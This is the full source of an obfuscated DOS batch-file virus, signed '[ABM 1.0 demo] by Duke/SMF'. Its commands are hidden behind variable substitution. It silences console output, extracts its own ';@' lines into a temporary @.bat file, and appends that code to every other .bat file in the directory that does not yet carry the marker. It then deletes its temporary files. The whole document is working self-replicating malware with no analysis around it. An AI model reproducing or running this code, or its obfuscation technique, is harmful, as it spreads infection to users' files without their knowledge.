;@set lop=ctty
;@set hb=nul
;@%lop% %hb%
;@set dp=if
;@set ot="%0
;@set lop="
;@set hp=goto
;@set ty=;@
;@%dp% %ot%==%lop% %hp% %ty%
;@set lop="%1
;@set hb="@
;@set ot=;@z
;@%dp% %lop%==%hb% %hp% %ot%
;@set lop=echo.
;@set vh=@.bat
;@%lop%>%vh%
;@set rc=find
;@set xjy=";@"
;@set lop=%0
;@%rc% %xjy%<%lop%>>%vh%
;@set lop=for
;@set ibq=%%b
;@set hb=in
;@set ot=(*.bat)
;@set hg=do
;@set shj=call
;@set wv=@
;@%lop% %ibq% %hb% %ot% %hg% %shj% %wv% %wv% %ibq%
;@set lop=del
;@set hb=@.*
;@%lop% %hb%
;@%hp% %ty%
:;@z [ABM 1.0 demo] by Duke/SMF
;@set wmc=%2
;@%rc% %xjy%<%wmc%
;@set lop=errorlevel
;@set hb=1
;@set ot=type
;@%dp% %lop% %hb% %ot% %vh%>>%wmc%
:;@
